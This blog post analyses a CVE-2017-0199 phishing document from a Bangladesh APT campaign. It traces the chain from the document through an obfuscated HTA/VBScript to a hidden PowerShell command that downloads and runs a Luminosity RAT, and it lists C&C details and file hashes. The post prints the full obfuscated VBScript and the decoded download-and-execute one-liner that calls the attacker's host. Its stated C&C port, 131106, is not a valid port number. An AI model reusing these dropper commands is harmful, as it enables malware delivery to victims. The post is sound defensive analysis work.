APT attack in Bangladesh



One of my friends from Bangladesh @rudr4_sarkar sent me this link to analyze which leads to a Word document.
http://mozillatm.com/A0Jst6jAd7CYerrqFmwb4wqDLa5XHPW_May_2017.doc

VirusTotal: https://virustotal.com/en/file/273b0fc627daefd0fbae209e5fa1ea619bfb177a1b0ae2d55a606cf2c6ec2674/analysis/1496541543/

I identified it as a CVE-2017-0199 exploit, and the payload URL was simple to find: it is stored in the document as a UTF-16LE string.

[code language="python"]
# Hex dump of the embedded UTF-16LE string (three leading and two trailing NUL bytes included).
b = '00000068007400740070003a002f002f006d006f007a0069006c006c00610074006d002e0063006f006d002f006c006f006100640069006e0067002e00680074006d006c00000000'

# Walk the hex two characters at a time and keep every non-NUL byte.
"".join(bytes.fromhex(i + j).decode() for i, j in zip(b[::2], b[1::2]) if i + j != '00')

>> 'http://mozillatm.com/loading.html'
[/code]

This exploit delivers a malicious HTA file and executes it. An HTA is run by the IE engine (mshta.exe), so the embedded VBScript executes without any trouble.

Once we visit this page we can see the obfuscated VBScript which will execute PowerShell and drop the malware on the system.

You can view the source from here: https://pastebin.com/kt3LNwiw
This part of the code seems to be interesting.

[code language="vb"]
fuNctioN gJSoYXXAVqwD()

DIM taCXnLuJDFFL

' Each CGUgZBJuvRsW(...) call base64-decodes its argument and HLJlzxWsFMxQ(...) strips the
' interleaved junk characters; the decoded strings are noted on each line.
taCXnLuJDFFL = cHRW(34) & _
    CReaTEoBJecT(HLJlzxWsFMxQ(CGUgZBJuvRsW("V1RzVENUUlRJVHBUVFQuVHNUaFRlVExUTFQ="))).expANdEnVIRoNMEnTSTrInGS(HLJlzxWsFMxQ(CGUgZBJuvRsW("JVpzWnlac1p0WmVaTVpSWm9ab1pUWiVa"))) & _
    HLJlzxWsFMxQ(CGUgZBJuvRsW("XGtTa3lrU2tUa0VrTWszazJrXGtXa2lrTmtEa29rV2tTa3Brb2tXa0Vrcmtza0hrRWtMa0xrXGt2azFrLmswa1xrcGtva3drZWtSa3NraGtFa0xrTGsua2VreGtFaw==")) & _
    ChRw(34)
' -> "WScript.Shell"  expands "%SystemRoot%"  then appends "\System32\WindowsPowerShell\v1.0\powershell.exe", all wrapped in Chr(34) quotes

' "WScript.Shell" again: run the quoted PowerShell path with the encoded command, window style 0 (hidden)
CreAtEOBJeCt(HLJlzxWsFMxQ(CGUgZBJuvRsW("d0FzQWNBckFJQXBBdEEuQXNBaEFFQWxBbEE="))).run taCXnLuJDFFL & _
    " POwerShELL.exe -EXECUtIOnPOlIcY BYPaSS -noPROfiLE -WInDoWStYlE HiDDen -EnCOdedCommAnD IAAoAG4ARQB3AC0AbwBCAEoARQBDAHQAIABTAHkAcwBUAEUATQAuAE4AZQBUAC4AVwBlAGIAYwBMAGkAZQBOAFQAKQAuAEQAbwB3AG4ATABPAEEARABGAGkATABFACgAIAAdIGgAdAB0AHAAOgAvAC8AbQBvAHoAaQBsAGwAYQB0AG0ALgBjAG8AbQAvAGwAbwBhAGQAaQBuAGcALgBlAHgAZQAdICAALAAgAB0gJABFAG4AdgA6AFQATQBQAFwAQwBoAHIAbwBtAGUAdABtAC4AZQB4AGUAHSAgACkAIAA7ACAAcwBUAEEAcgBUACAAHSAkAEUAbgB2ADoAdABNAFAAXABDAGgAcgBvAG0AZQB0AG0ALgBlAHgAZQAdIA== " , 0

eND fUnCtioN
[/code]

Obfuscation aside, if we debug the code, the taCXnLuJDFFL variable finally contains
[code language="text"]
""C:\Windows\SySTEM32\WiNDoWSpoWErsHELL\v1.0\poweRshELL.exE""
[/code]

We could write the equivalent pseudo code like this.

[code language="vb"]
Set oShell = WScript.CreateObject("WScript.Shell")
' The quoted PowerShell path (the value of taCXnLuJDFFL) followed by the encoded command, run with a hidden window (0).
oShell.Run """C:\Windows\SySTEM32\WiNDoWSpoWErsHELL\v1.0\poweRshELL.exE""" & " POwerShELL.exe -EXECUtIOnPOlIcY BYPaSS -noPROfiLE -WInDoWStYlE HiDDen -EnCOdedCommAnD IAAoAG4ARQB3AC0AbwBCAEoARQBDAHQAIABTAHkAcwBUAEUATQAuAE4AZQBUAC4AVwBlAGIAYwBMAGkAZQBOAFQAKQAuAEQAbwB3AG4ATABPAEEARABGAGkATABFACgAIAAdIGgAdAB0AHAAOgAvAC8AbQBvAHoAaQBsAGwAYQB0AG0ALgBjAG8AbQAvAGwAbwBhAGQAaQBuAGcALgBlAHgAZQAdICAALAAgAB0gJABFAG4AdgA6AFQATQBQAFwAQwBoAHIAbwBtAGUAdABtAC4AZQB4AGUAHSAgACkAIAA7ACAAcwBUAEEAcgBUACAAHSAkAEUAbgB2ADoAdABNAFAAXABDAGgAcgBvAG0AZQB0AG0ALgBlAHgAZQAdIA== " , 0
[/code]

Once we decode the encoded command supplied to PowerShell (base64 over UTF-16LE text) we can see the malware being downloaded.
[code language="powershell"]
$EncodedText = "IAAoAG4ARQB3AC0AbwBCAEoARQBDAHQAIABTAHkAcwBUAEUATQAuAE4AZQBUAC4AVwBlAGIAYwBMAGkAZQBOAFQAKQAuAEQAbwB3AG4ATABPAEEARABGAGkATABFACgAIAAdIGgAdAB0AHAAOgAvAC8AbQBvAHoAaQBsAGwAYQB0AG0ALgBjAG8AbQAvAGwAbwBhAGQAaQBuAGcALgBlAHgAZQAdICAALAAgAB0gJABFAG4AdgA6AFQATQBQAFwAQwBoAHIAbwBtAGUAdABtAC4AZQB4AGUAHSAgACkAIAA7ACAAcwBUAEEAcgBUACAAHSAkAEUAbgB2ADoAdABNAFAAXABDAGgAcgBvAG0AZQB0AG0ALgBlAHgAZQAdIA=="
# -EncodedCommand expects base64 of UTF-16LE, hence the Unicode encoding here
$DecodedText = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText))
Write-Host $DecodedText
[/code]

This is a PowerShell one-liner that downloads the malware from http://mozillatm.com/loading.exe, saves it to the %TMP% folder as "Chrometm.exe" and starts it. Note that the string delimiters in the decoded command are not ASCII quotes but Unicode right double quotation marks (U+201D); PowerShell accepts these as quotes, so detection logic that only looks for a plain " will miss them.

[code language="powershell"]
(nEw-oBJECt SysTEM.NeT.WebcLieNT).DownLOADFiLE( ”http://mozillatm.com/loading.exe” , ”$Env:TMP\Chrometm.exe” ) ; sTArT ”$Env:tMP\Chrometm.exe”
[/code]
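As an added example (not from the original post), a small Python triage helper that decodes an -EncodedCommand blob the same way the PowerShell snippet above does and pulls out the download URL and drop path; the blob is the one from this HTA. It also normalizes the curly U+201D quotes that the decoded command uses, since a regex that stops at a plain " would otherwise run past the closing quote.

```python
import base64
import re

# The -EncodedCommand blob from the HTA analysed above (taken from the page, not constructed).
ENCODED = "IAAoAG4ARQB3AC0AbwBCAEoARQBDAHQAIABTAHkAcwBUAEUATQAuAE4AZQBUAC4AVwBlAGIAYwBMAGkAZQBOAFQAKQAuAEQAbwB3AG4ATABPAEEARABGAGkATABFACgAIAAdIGgAdAB0AHAAOgAvAC8AbQBvAHoAaQBsAGwAYQB0AG0ALgBjAG8AbQAvAGwAbwBhAGQAaQBuAGcALgBlAHgAZQAdICAALAAgAB0gJABFAG4AdgA6AFQATQBQAFwAQwBoAHIAbwBtAGUAdABtAC4AZQB4AGUAHSAgACkAIAA7ACAAcwBUAEEAcgBUACAAHSAkAEUAbgB2ADoAdABNAFAAXABDAGgAcgBvAG0AZQB0AG0ALgBlAHgAZQAdIA=="

# PowerShell accepts the Unicode curly quotes as string delimiters; this sample uses U+201D,
# so an extraction regex that only knows '"' would not see where the strings end.
CURLY_QUOTES = {0x201C: '"', 0x201D: '"', 0x2018: "'", 0x2019: "'"}


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE text, exactly what the PowerShell snippet decodes."""
    return base64.b64decode(blob).decode("utf-16-le")


def normalize_quotes(script: str) -> str:
    """Map curly quotes to their ASCII equivalents so the regexes see the real string boundaries."""
    return script.translate(CURLY_QUOTES)


def extract_iocs(script: str) -> dict:
    """Return URLs, environment-relative drop paths and notable verbs found in a decoded command."""
    s = normalize_quotes(script)
    urls = re.findall(r"https?://[^\s\"']+", s)
    paths = re.findall(r"\$Env:[A-Za-z_]+\\[^\s\"']+", s, flags=re.IGNORECASE)
    verbs = [v for v in ("DownloadFile", "DownloadString", "Invoke-Expression", "Start")
             if re.search(re.escape(v), s, re.IGNORECASE)]
    return {"urls": urls, "paths": paths, "verbs": verbs}


if __name__ == "__main__":
    decoded = decode_encoded_command(ENCODED)
    print(decoded)
    print(extract_iocs(decoded))
```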

This malware is written in Visual Basic and highly obfuscated. I submitted this sample to Malwr.com and you can view the complete analysis here. Seems like the attackers are using Luminosity RAT.

https://malwr.com/analysis/YmJiNTEwYzE5OWFkNDZjYmFiNTY0OWZhMzA5YzgyOGY/

After running, it copies itself into the "Program Files" folder as "Mozillatm.exe"; we can check the autorun entries. There is another executable, "Mozillatms.exe" (note the extra 's'), inside the "system32" folder, which seems to be a backup copy.

The copy inside “Program Files”.

However, I noticed that on 64-bit machines the malware copies itself into the "C:\windows\SysWow64" folder instead (file system redirection sends a 32-bit process's writes to System32 there), so this autorun key won't resolve under 64-bit, meaning the backup copy fails on 64-bit machines.

“Mozillatm.exe” will be our malicious executable running.

The malware communicates with its C&C at the IP address 162.248.92.28:131106.

The malware stores screenshots and keystroke logs and sends them to the C&C server. They are located inside %USERPROFILE%\AppData\Roaming\Mozillatms.

Keystroke logs can be found inside the “logs” folder.

The screenshot data is compressed with the deflate algorithm, applied twice (the output of the first deflate is deflated again). It can nevertheless be decompressed easily.

I wrote a simple tool to perform compression and decompression using the deflate algorithm.

[code language="text"]
Deflate.exe "6.51 PM" output.jpg -d
[/code]
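The same double-deflate unpacking in Python, as an added example rather than the author's Deflate.exe tool: the input is a constructed stand-in for a screenshot file (a JPEG header plus filler) deflated twice, and the unpacker peels layers until the output is no longer a deflate stream, with a layer cap so a deliberately deep nesting cannot run away.

```python
import zlib
from typing import Optional, Tuple

# Constructed stand-in for one of the malware's screenshot files: a JPEG header plus filler.
SAMPLE_SCREENSHOT = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + bytes(range(256)) * 2


def deflate_raw(data: bytes) -> bytes:
    """Raw deflate (no zlib/gzip header); used here only to build the nested sample."""
    c = zlib.compressobj(level=6, wbits=-zlib.MAX_WBITS)
    return c.compress(data) + c.flush()


def inflate_once(data: bytes) -> Optional[bytes]:
    """Inflate one layer, accepting raw deflate, zlib-wrapped or gzip-wrapped streams.
    Returns None when the data is not a deflate stream. A JPEG is never mistaken for one:
    its FF D8 start is reserved block type 3 as raw deflate, an invalid zlib CMF byte,
    and the wrong gzip magic."""
    for wbits in (-zlib.MAX_WBITS, zlib.MAX_WBITS, zlib.MAX_WBITS | 16):
        try:
            return zlib.decompress(data, wbits)
        except zlib.error:
            continue
    return None


def inflate_nested(data: bytes, max_layers: int = 4) -> Tuple[bytes, int]:
    """Peel deflate layers until the output stops being a deflate stream.
    Returns (payload, layers_removed); max_layers bounds the work."""
    current, layers = data, 0
    while layers < max_layers:
        out = inflate_once(current)
        if out is None:
            break
        current, layers = out, layers + 1
    return current, layers


if __name__ == "__main__":
    nested = deflate_raw(deflate_raw(SAMPLE_SCREENSHOT))
    payload, layers = inflate_nested(nested)
    is_jpeg = payload.startswith(b"\xff\xd8")
    print(f"removed {layers} deflate layers, {len(payload)} bytes, JPEG header: {is_jpeg}")
```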


This is an example screenshot taken by the malware.

Out of curiosity I had a look at the C&C IP address 162.248.92.28 and found it running a Squid proxy.

However, the proxy uses HTTP authentication.

With a bit of Googling, I found out that these domains too are variants of this attack using the same malware.

  • Bd2bd.com
  • Pc-net.org
  • Bd-pc.com
  • Registerbd.com

You can find more details by beetles.io on http://blog.beetles.io/2017/05/29/apt-rat-1/ and https://blog.beetles.io/2017/06/01/operation-brightroar-uncovering-more-attack-pattern/

The samples I've analyzed:

Filename: loading.exe
SHA256: 9865ccfe4dd0c893c88d24168425933e5663ee8861a3b360e1b10e63769f5392
https://virustotal.com/en/file/9865ccfe4dd0c893c88d24168425933e5663ee8861a3b360e1b10e63769f5392/analysis/1496541573/
https://malwr.com/analysis/YmJiNTEwYzE5OWFkNDZjYmFiNTY0OWZhMzA5YzgyOGY/

Filename: A0Jst6jAd7CYerrqFmwb4wqDLa5XHPW_May_2017.doc
SHA256: 273b0fc627daefd0fbae209e5fa1ea619bfb177a1b0ae2d55a606cf2c6ec2674
https://virustotal.com/en/file/273b0fc627daefd0fbae209e5fa1ea619bfb177a1b0ae2d55a606cf2c6ec2674/analysis/1496541543/

5 thoughts on "APT attack in Bangladesh"

  1. Good article Malith. The malware has added itself in the task and queries to 192.168.0.142? Any thought on this?